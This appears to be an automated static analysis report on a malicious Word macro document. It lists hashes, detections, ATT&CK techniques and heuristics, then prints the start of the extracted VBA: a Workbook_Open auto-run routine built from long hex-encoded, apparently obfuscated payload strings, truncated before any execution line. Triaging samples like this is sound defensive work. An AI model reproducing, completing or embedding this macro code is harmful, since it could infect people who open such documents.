Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 084e055be24e8af2…

MALICIOUS

Office (OLE)

Size: 98.5 KB
Created: 2018-02-22 07:51:00
Authoring application: Microsoft Office Word
First seen: 2019-06-27
MD5: f05e2739fc739b6ba31bd199872e4d5c
SHA-1: 02bb3694cebf7af7f9c86d21ba60d30e28a7111b
SHA-256: 084e055be24e8af2475fc5069b1e4b15d097622eff9a764fa50a003cbf67a918
Risk Score: 224

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains VBA macros, including a Workbook_Open macro, an auto-execute event handler commonly used to run malicious code as soon as the document is opened. The critical heuristic that fired on a Shell() call in the VBA indicates that the macro attempts to execute external commands. The ClamAV detection further confirms its malicious nature. The macro likely downloads and executes a second-stage payload, although the specific URL or payload cannot be extracted directly from the truncated script shown below.

Heuristics (7)

  • ClamAV: Xls.Malware.Cwsp-6735643-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro
  • Workbook_Open macro [high] (OLE_VBA_WBOPEN)
    Workbook_Open macro
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11228 bytes
SHA-256: d347961af119f1690398fd584b4de69ba0fa4c02b040712293acd0c327016ec2
Detection
  ClamAV: No threats found
  Obfuscation or payload: likely
  Carved artifact contains 38 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Sub Workbook_Open()
Dim BU_MV As String
BU_MV = "4C311D4C4C4C4C8B1B4C8A4C4C4C4C8B4C29104C8472225E855A4C4C4C474C677E4C4C4C4C68244C4C4C4C52770E5D4C4C416E694C1D80691B4C3F53424C4C582F2E274F4C4C621169114C4C4C4C834C583F4C4C3F4C6E4D644C16364C7E4C114C4C544C424C4C8B186474184C8A4B4C564"
Dim R_ES As String
R_ES = "C4C4C264C4C4C4C6A4C38414C1E4C394C4C4C5A4C4F4C4C3C624C4C6F3F7A4C4C694A4C4C2D691F524C4C2F894C4C5E7544324C4C144C394B68772E1E4C864C4C6F4C4C814C4C827848567C4C4C68234C4C4C54124C624C4C4C6E4C480E56662E8226524C4C80614C236E4C214B4C4C1B17"
Dim KM_JDY As String
KM_JDY = "4C0F8A844C846C4C4C5F4C4C3D460D234C4F4C232B4C4C4C4C4C4C5A294C4C3D85544C4C4C144C2D4C4C4C344C4C7F501B4C4C4C884C4C4C4C594C434C254C4C4C482E824C3D244C724C156F4C4C4C4C524C4C114C214C2C4C664C154C4C73114C5D4C234C4C32230D454C4C4C6A2B754C3"
Dim QTC_CZ As String
QTC_CZ = "34C43636D511E696A884C4C2F4C4C4C174C4C7D824C114C713440214C4C4C7B394C244C4C7B4C858240764C4C234C425F4C4C564C443F4C4C294C544C4C4C6D4C4C4C664C4C4C3E4C4C274C364C295F71476D4C4C4C66437F4C4C3D104C5C154C4C64754C4C4C5C5D0F296D4C314C4C4C6C"
Dim YHV_BIN As String
YHV_BIN = "4C4C7F1F394C4C66361A664C7A4C2D4C4C4C4C4C4C4C4C4C4C4C5A3D24474C4C4C4C4C8576594C4C4C4C644C4C864C4C4C184C3C4C4C4C28144C4C4C4E4C14814C4C4C29594C7F4C4C164120252F757C283C0F4C4C4C11136A6E4C4C4C4C5D48374C374C4C4C3B4518398478144C807A336"
Dim YWH_F As String
YWH_F = "A124C4C4C234C2C4C530D4C1A4C4C4C404A4C794C4C4C4C4C627F4C4A7D4C4C584C6633824C4C79574C1746774C3C0D74434C4C4C3E264C3F35874C4C4C164C717C4C544C194C494C444C4C4C692F20337F4C134C4C4C27846B4C5920334C664C874C4C4C4C78687A72194C4C873A4C1373"
Dim TC_YCN As String
TC_YCN = "8047720F9C4C8B4C432689354C833D4C5F4C34314B133D4C754C6D7F4C3E29534C4C4C4C4C527B7D25424E4C4A4C19834C4C5C4C4F42404275674C38184C114C43894C4C4A4C4E4C4C324C4C374F604C44634C74778A5F4C8B6A8C5072533D524C4C4C28464C4C1B324C1C6E534C3C4C4C1"
Dim JZ_AUW As String
JZ_AUW = "C4C4C3B4C1E634C8B5B4B4C825B4C4C4C764C454C4B244C4F4C7B4C844C3A4C77634C4C234C68894C4C0D584C4C3D4C4C4C4C4C59684C7C4C414C144C1D4C174C402C4C4C4C424C144C23804C4C4A3D4C4C74144C165C4C6E87804C254C534C4C184C174C4C524C8C4C4C4C4C8A3A4C4C4C"
Dim MI_RQT As String
MI_RQT = "4D4C4C404C4D4C4C6089334C4C644D4C4C2069554CD5784C764C4C5D4C7D534C7163257A2D444C4C4C4C566519154D764C6D4C59846738684C4D406A4C4C4C194C394C0D342E4C4C594C4C4C204C6E4C6B6E324C4C5817384C4C4C117A10693049854C8A4D4F4C4C4C387966284C4C4C4C4"
Dim AWW_K As String
AWW_K = "64C3E4C4C4C76884C4C31564C4C0F4C4C4C6F294C802F4D2D4C4C4C4B3F4C752F88184C4C4C774C5F4C4C4C4C26274C4C658B4C411C4C4C4C114C4C4C7E4C7B3F4C144C4C4C514E4C4D4C4B4C324C4C6850674C89544C4C4C27731D4C6249300D7A862E2030146D47714C4C4C4C2D4C4C4C"
Dim M_YB As String
M_YB = "406E244C4C4C4C268C4C408746114C4A624C734C45494C4C254C394C4C4C4C1F2E4C1916884C324C4C474C144C784C7F514C404C4C4C322A554C564C324C4C166E74253787404C2A4D4C0F374C3B426E4C863C614C2E334C4C4C4C51634C4C74814C604C4C1D4C234C3472304C217B4C554"
Dim S_W As String
S_W = "C4C75534C824C7F434C4C4C4C720F4C4C4C4C754A4B6E4C4C4C4C2D4C3C4C3D4C4C1D49486E37784C4C4A4C3F4C4C4C4C4C3F4C274C738413593C4C5F4A4C104C264C614C7E4C4C2A4C0E4C4C1C167C4C4C4C47234C694C424C3F544C588A4C4C7B4C4C454C4C234C214C835E4C2D4C2C4C"
Dim GK_MHO As String
GK_MHO = "4E4C4C6B874C4C4C5A5B4D8C127918658366444C7D5730264C86304C771E7A4C89484C4C4C4742895316714C4C4C1652394C4C4C304C6D4C4C4C0E4C4C24494C0F4C374C49304C72734C686A1E4C264C4B754C4C66774C49394C414C4C354C454C224C274C796A3A4C788756444C738B1B4"
Dim A_HMC As String
A_HMC = "C4C4C6C4C4C784C4C4C4C814C81318C4C4C4C4C4C4C4C4C4C1A4C4C4C4C724C25614C4C39364C7B624C4C4C4C1F334C4C3D4C70131A6D4C4C834C2D7F4C68764C4C4C4C19644C572E5E4C155D2A4C4C880D4C8A4C4C4C624C3D4C4C5A4C6062844C1E4C404C4C4E4C71644C4C36404C4B80"
Dim QE_ML As String
QE_ML = "4C4C254C8781334C854C7B4C7A4C4C78334C4C454C5C4C824C4C5E2B4C274C803474736B4C75194C207A537B4C22360
... (truncated)